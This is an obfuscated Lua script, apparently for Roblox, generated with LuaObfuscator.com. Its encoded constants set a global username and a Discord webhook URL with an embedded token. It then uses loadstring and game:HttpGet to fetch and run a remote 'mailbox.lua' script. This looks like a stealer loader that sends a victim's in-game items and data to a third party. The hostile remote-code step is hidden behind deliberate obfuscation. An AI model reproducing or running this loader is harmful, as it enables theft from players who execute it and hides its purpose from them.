--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.12) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v87=v5(v81,v19);v19=nil;return v87;else return v81;end end end);local function v20(v31,v32,v33)if v33 then local v82=(v31/((5 -3)^(v32-((879 -(282 + 595)) -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v82-(v82%1) ;else local v83=(570 -(367 + 201))^(v32-(928 -((1851 -(1523 + 114)) + 713))) ;return (((v31%(v83 + v83))>=v83) and (1 + 0 + 0)) or (0 + 0) ;end end local function v21()local v34=0;local v35;while true do if (v34==1) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + (1066 -(68 + 997)) ;v34=1271 -(226 + 1044) ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (8 -6) ;return (v37 * (373 -(32 + 85))) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + 3 + (0 -0) );v18=v18 + 1 + 3 ;return (v41 * (16778173 -((1637 -745) + (415 -(87 + 263))))) + (v40 * (156337 -(90981 -(67 + 113)))) + (v39 * 256) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=1 + (791 -(368 + 423)) ;local v45=(v20(v43,(6 -4) -1 ,20) * ((2 + 0)^32)) + v42 ;local v46=v20(v43,21,(141 -(10 + 8)) -92 );local v47=((v20(v43,122 -90 )==1) and  -(953 -(802 + 150))) or (2 -1) ;if (v46==(0 -0)) then if (v45==((442 -(416 + 26)) + 0)) then return v47 * (997 -(915 + 82)) ;else local v88=0 -0 ;while true do if (v88==(0 + 0)) then v46=1 -0 ;v44=1187 -(1069 + 118) ;break;end end end elseif (v46==(4643 -2596)) then return ((v45==0) and (v47 * ((1 -(0 -0))/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(1817 -794) ) * (v44 + (v45/(2^(52 + 0)))) ;end local function v25(v48)local v49=0;local v50;local v51;while true do if (v49==(2 + 1)) then return v6(v51);end if (v49==((0 -0) -(0 + 0))) then v50=nil;if  not v48 then v48=v23();if (v48==(438 -(145 + 293))) then return "";end end v49=431 -(44 + 386) ;end if (v49==(1488 -(998 + 488))) then v51={};for v89=1 + 0 , #v50 do v51[v89]=v2(v1(v3(v50,v89,v89)));end v49=3 + 0 ;end if (v49==(773 -(201 + 571))) then v50=v3(v16,v18,(v18 + v48) -(1139 -(116 + 1022)) );v18=v18 + v48 ;v49=8 -6 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=936 -(280 + 656) ;local v53;local v54;local v55;local v56;local v57;local v58;while true do local v65=0;local v66;while true do if (v65==0) then v66=0 -0 ;while true do if (v66~=(2 -1)) then else if (0==v52) then local v99=1700 -(1419 + 281) ;while true do if (v99~=(2 -0)) then else v52=1;break;end if (v99~=(74 -(71 + 3))) then else v53={};v54={};v99=1;end if (v99==(1 + 0)) then v55={};v56={v53,v54,nil,v55};v99=2 -0 ;end end end break;end if (v66==(241 -(187 + 54))) then if (v52==(782 -(162 + 618))) then local v100=0;while true do if (v100~=1) then else return v56;end if (0==v100) then for v131=1 + 0 ,v23() do local v132=0;local v133;local v134;local v135;while true do if (v132==1) then v135=nil;while true do if (v133==0) then local v168=0;while true do if (v168==(1 + 0)) then v133=1;break;end if (v168~=0) then else v134=0 -0 ;v135=nil;v168=1 -0 ;end end end if (v133==(1 + 0)) then while true do if (v134~=(1636 -(1373 + 263))) then else v135=v21();if (v20(v135,1001 -(451 + 549) ,1)==(0 + 0)) then local v172=0 -0 ;local v173;local v174;local v175;local v176;local v177;while true do if (v172~=(1 -0)) then else local v179=1384 -(746 + 638) ;while true do if (v179==1) then v172=1 + 1 ;break;end if (v179==0) then v175=nil;v176=nil;v179=1;end end end if (v172~=2) then else v177=nil;while true do if (v173==0) then local v180=0;local v181;while true do if (v180==(0 -0)) then v181=0;while true do if (v181==(342 -(218 + 123))) then v173=1582 -(1535 + 46) ;break;end if (v181~=(0 + 0)) then else v174=0 + 0 ;v175=nil;v181=561 -(306 + 254) ;end end break;end end end if (v173==1) then local v182=0;while true do if ((1 + 0)~=v182) then else v173=3 -1 ;break;end if (v182==(1467 -(899 + 568))) then v176=nil;v177=nil;v182=1 + 0 ;end end end if ((4 -2)==v173) then while true do if (v174~=(605 -(268 + 335))) then else local v183=0;while true do if (v183~=(291 -(60 + 230))) then else v174=575 -(426 + 146) ;break;end if (v183==0) then local v192=0 + 0 ;while true do if (v192~=(1456 -(282 + 1174))) then else local v193=0;while true do if (v193==(812 -(569 + 242))) then v192=2 -1 ;break;end if (v193~=(0 + 0)) then else if (v20(v176,1,1)~=1) then else v177[2]=v58[v177[1026 -(706 + 318) ]];end if (v20(v176,2,1253 -(721 + 530) )==(1272 -(945 + 326))) then v177[7 -4 ]=v58[v177[3 + 0 ]];end v193=1;end end end if (v192==(701 -(271 + 429))) then v183=1;break;end end end end end if (v174==0) then local v184=0 + 0 ;local v185;while true do if (v184==0) then v185=1500 -(1408 + 92) ;while true do if (v185~=1) then else v174=1;break;end if (v185==0) then local v194=1086 -(461 + 625) ;local v195;while true do if (v194==(1288 -(993 + 295))) then v195=0;while true do if (v195==(0 + 0)) then v175=v20(v135,2,1174 -(418 + 753) );v176=v20(v135,4,3 + 3 );v195=1 + 0 ;end if (v195==1) then v185=1 + 0 ;break;end end break;end end end end break;end end end if (v174~=(1 + 0)) then else local v186=0;local v187;local v188;while true do if (v186~=(530 -(406 + 123))) then else while true do if (v187==0) then v188=1769 -(1749 + 20) ;while true do if (v188==(1 + 0)) then v174=1324 -(1249 + 73) ;break;end if (v188~=(0 + 0)) then else v177={v22(),v22(),nil,nil};if (v175==0) then local v200=0;local v201;local v202;while true do if (v200==1) then while true do if (v201==(1900 -(106 + 1794))) then v202=0 + 0 ;while true do if (v202==0) then v177[3]=v22();v177[2 + 2 ]=v22();break;end end break;end end break;end if (v200==(0 -0)) then v201=0 -0 ;v202=nil;v200=115 -(4 + 110) ;end end elseif (v175==1) then v177[587 -(57 + 527) ]=v23();elseif (v175==2) then v177[1430 -(41 + 1386) ]=v23() -((105 -(17 + 86))^(11 + 5)) ;elseif (v175~=3) then else local v205=0;local v206;local v207;while true do if (v205==(1 -0)) then while true do if (v206~=0) then else v207=0 -0 ;while true do if ((166 -(122 + 44))==v207) then v177[5 -2 ]=v23() -((6 -4)^(14 + 2)) ;v177[4]=v22();break;end end break;end end break;end if (v205==0) then v206=0;v207=nil;v205=1;end end end v188=1;end end break;end end break;end if (v186==0) then v187=0;v188=nil;v186=1;end end end if (v174==3) then if (v20(v176,3,3)==(1 + 0)) then v177[4]=v58[v177[7 -3 ]];end v53[v131]=v177;break;end end break;end end break;end if ((65 -(30 + 35))==v172) then v173=0;v174=nil;v172=1;end end end break;end end break;end end break;end if (v132==(0 + 0)) then v133=1257 -(1043 + 214) ;v134=nil;v132=1;end end end for v136=3 -2 ,v23() do v54[v136-1 ]=v28();end v100=1;end end end if (v52==(1213 -(323 + 889))) then local v101=0 -0 ;while true do if (v101==(580 -(361 + 219))) then v57=v23();v58={};v101=321 -(53 + 267) ;end if (v101~=(1 + 0)) then else for v138=414 -(15 + 398) ,v57 do local v139=0;local v140;local v141;local v142;while true do if (v139==1) then v142=nil;while true do if (v140~=1) then else if (v141==(983 -(18 + 964))) then v142=v21()~=0 ;elseif (v141==(7 -5)) then v142=v24();elseif (v141~=3) then else v142=v25();end v58[v138]=v142;break;end if (v140==0) then local v170=0 + 0 ;local v171;while true do if (v170~=0) then else v171=0;while true do if (v171~=(1 + 0)) then else v140=1;break;end if (v171~=(850 -(20 + 830))) then else local v178=0 + 0 ;while true do if (v178==(126 -(116 + 10))) then v141=v21();v142=nil;v178=1 + 0 ;end if (v178~=(739 -(542 + 196))) then else v171=1;break;end end end end break;end end end end break;end if (v139==0) then local v165=0;while true do if ((0 -0)==v165) then v140=0 + 0 ;v141=nil;v165=1;end if ((1 + 0)==v165) then v139=1;break;end end end end end v56[3]=v21();v101=2;end if (v101==2) then v52=2;break;end end end v66=1 + 0 ;end end break;end end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v84=0,v75 do if (v84>=v69) then v73[v84-v69 ]=v74[v84 + 1 ];else v77[v84]=v74[v84 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=5) then if (v80<=2) then if (v80<=0) then v77[v79[2]]=v79[3];elseif (v80==1) then local v102=v79[2];local v103,v104=v70(v77[v102](v13(v77,v102 + 1 ,v79[3])));v72=(v104 + v102) -1 ;local v105=0;for v128=v102,v72 do local v129=0;while true do if (v129==0) then v105=v105 + 1 ;v77[v128]=v103[v105];break;end end end else do return;end end elseif (v80<=3) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80>4) then v77[v79[2]]=v79[3]~=0 ;else v71=v79[3];end elseif (v80<=8) then if (v80<=6) then v77[v79[2]]=v61[v79[3]];elseif (v80>7) then local v109=v79[2];local v110=v77[v79[3]];v77[v109 + 1 ]=v110;v77[v109]=v110[v79[4]];else v77[v79[2]]();end elseif (v80<=10) then if (v80>9) then local v114=v79[2];v77[v114]=v77[v114](v13(v77,v114 + 1 ,v72));else local v116=0;local v117;local v118;local v119;local v120;local v121;while true do if (1==v116) then v79=v67[v71];v121=v79[2];v120=v77[v79[3]];v77[v121 + 1 ]=v120;v77[v121]=v120[v79[4]];v71=v71 + 1 ;v116=2;end if (v116==0) then v117=nil;v118,v119=nil;v120=nil;v121=nil;v77[v79[2]]=v61[v79[3]];v71=v71 + 1 ;v116=1;end if (v116==2) then v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3]~=0 ;v71=v71 + 1 ;v116=3;end if (v116==4) then v71=v71 + 1 ;v79=v67[v71];v121=v79[2];v77[v121]=v77[v121](v13(v77,v121 + 1 ,v72));v71=v71 + 1 ;v79=v67[v71];v116=5;end if (3==v116) then v79=v67[v71];v121=v79[2];v118,v119=v70(v77[v121](v13(v77,v121 + 1 ,v79[3])));v72=(v119 + v121) -1 ;v117=0;for v163=v121,v72 do local v164=0;while true do if (v164==0) then v117=v117 + 1 ;v77[v163]=v118[v117];break;end end end v116=4;end if (v116==5) then v77[v79[2]]();v71=v71 + 1 ;v79=v67[v71];v71=v79[3];break;end end end elseif (v80==11) then v61[v79[3]]=v77[v79[2]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v61[v79[3]]=v77[v79[2]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v71=v79[3];else v61[v79[3]]=v77[v79[2]];end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031E3O00682O7470733A2O2F672O6F662E70726F2F732F6D61696C626F782E6C756103083O00557365724E616D65030C3O006A616D616C7468656775793003073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3133313633373O3836303233342O3539322F61383744696E63416C55596350372O4B5077703274415F73356670697A564B74416E7748327A75647956572O777A6239687674563235724A69386878723155385541703300153O00124O00013O0026033O000C00010002002O043O000C0001001206000100033O001209000200043O00202O00020002000500122O000400066O000500016O000200056O00013O00024O00010001000100044O001400010026033O000100010001002O043O0001000100122O000100083O00120B000100073O00122O0001000A3O00122O000100093O00124O00023O00044O000100012O00023O00017O00",v9(),...);
